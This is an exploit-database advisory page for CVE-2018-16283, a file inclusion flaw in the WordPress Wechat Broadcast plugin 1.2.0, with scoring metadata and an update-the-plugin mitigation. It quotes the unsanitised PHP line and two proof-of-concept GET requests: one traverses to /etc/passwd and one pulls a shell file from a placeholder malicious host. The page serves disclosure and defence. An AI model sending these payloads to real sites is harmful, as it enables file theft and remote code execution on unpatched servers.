header-logo
Suggest Exploit
vendor:
Wechat Broadcast
by:
Manuel Garcia Cardenas
9.8
CVSS
CRITICAL
Local File Inclusion
22
CWE
Product Name: Wechat Broadcast
Affected Version From: 1.2.2000
Affected Version To: 1.2.2000
Patch Exists: YES
Related CWE: CVE-2018-16283
CPE: a:wordpress:wechat_broadcast:1.2.0
Metasploit:
Other Scripts:
Tags: edb,seclists,cve,cve2018,wordpress,wp-plugin,lfi
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nuclei References: https://www.exploit-db.com/exploits/45438https://nvd.nist.gov/vuln/detail/CVE-2018-16283https://github.com/springjk/wordpress-wechat-broadcast/issues/14http://seclists.org/fulldisclosure/2018/Sep/32https://exchange.xforce.ibmcloud.com/vulnerabilities/150202
Nuclei Metadata: {'max-request': 1, 'framework': 'wordpress', 'vendor': 'wechat_brodcast_project', 'product': 'wechat_brodcast'}
Platforms Tested: WordPress
2018

WordPress Plugin Wechat Broadcast 1.2.0 – Local File Inclusion

This bug allows for local or remote file inclusion in the Wechat Broadcast plugin for WordPress. The vulnerability can be exploited by using the version 1.0 of the HTTP protocol to interact with the application. The specific file affected is /wechat-broadcast/wechat/Image.php, where the 'url' parameter is not properly sanitized.

Mitigation:

To mitigate this vulnerability, it is recommended to update the plugin to the latest version.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/
# CVE: CVE-2018-16283

# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" it is not sanitized allowing include local or remote files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol 
# to interact with the application.

# PoC
# The following URL have been confirmed that is vulnerable to local and remote file inclusion.

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd

# Remote File Inclusion POC:

GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt

Navigation

Suggest Exploit

Services By CQR